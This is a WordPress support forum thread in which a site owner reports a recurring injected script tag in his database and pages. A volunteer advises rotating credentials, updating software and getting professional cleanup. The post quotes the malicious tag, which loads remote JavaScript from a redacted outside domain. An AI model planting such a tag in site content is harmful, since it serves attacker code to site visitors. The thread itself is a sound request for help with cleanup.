Malware Javascript

  • Resolved Andrew Leonard

    (@andrewleonard)


    5 years, 7 months ago

    Twice now we have been infected by the following code:
    <script type="text/javascript" src="//xxxxxxx.com/apu.php?zoneid=676630" async data-cfasync="false"></script>
    It gets put into the database and ends up at the bottom of each page and post (and also in TablePress)
    I do not understand how this happens
    If I restore the database, the problem is cured but it re-appears
    Any advice gratefully received

    • This topic was modified 5 years, 7 months ago by Jan Dembowski. Reason: Removed tag and domain
Viewing 2 replies - 1 through 2 (of 2 total)
  • Thread Starter Andrew Leonard

    (@andrewleonard)

    @slhatton
    Can you get this?
    I agree with you
    I think we found the code in wp_posts
    I have a colleague helping me who suggested looking at the database
    I think it would be good for us to communicate but I am not sure how

    • This reply was modified 5 years, 7 months ago by Andrew Nevins. Reason: Email solicitation redacted

    Hey @andrewleonard,

    I’m sorry to hear that you’re experiencing this, I know it can be frustrating.

    Please update your database, (s)FTP, and hosting panel credentials.

    Also, make sure all software on the site is up to date.

    If the site is being reinfected after restoring the database it means either it’s not fully restoring before the compromise, or the point of entry is elsewhere. My best suggestion would be to get with a hack repair service to have a professional clean it, and patch the point of entry.

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thanks,

    Gerald

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Malware Javascript’ is closed to new replies.